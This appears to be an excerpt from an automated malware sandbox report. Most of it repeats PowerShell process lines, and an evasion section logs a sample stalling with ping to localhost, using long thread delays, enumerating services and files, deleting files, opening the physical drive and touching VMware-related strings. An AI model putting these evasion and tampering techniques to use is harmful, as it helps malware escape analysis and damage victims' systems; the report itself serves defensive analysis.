            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Delayed program exit found
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040E18D Sleep,ExitProcess,10_2_0040E18D
            Uses ping.exe to sleep
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_004186FE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3488Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1643Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1080Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3946Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5868Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5766Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3859Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1440Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep count: 3488 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep count: 1643 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep count: 3946 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep count: 5868 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep time: -18446744073709540s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6156Thread sleep count: 118 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6156Thread sleep time: -59000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6520Thread sleep count: 5766 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6520Thread sleep time: -17298000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6520Thread sleep count: 3859 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6520Thread sleep time: -11577000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 7436Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0041A01B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0040B28E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0040838E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_004087A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_00407848
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004068CD FindFirstFileW,FindNextFileW,10_2_004068CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044BA59 FindFirstFileExA,10_2_0044BA59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040AA71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00417AAB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040AC78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406D28
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: wscript.exe, 00000000.00000002.2182577413.0000022446C27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ehKiAltTWegWGALbNmWxlGKicoNaLhLSfkgPvmCicLWJRKWZiqxKUhLKLkhLKKLqiloo}T
            Source: svchost.exe, 00000011.00000002.2401514545.0000000002C3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: svchost.exe, 00000056.00000002.3364421731.000000000363F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 00000056.00000002.3364696355.0000000003670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows\SysWOW64\svchost.exe4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f563
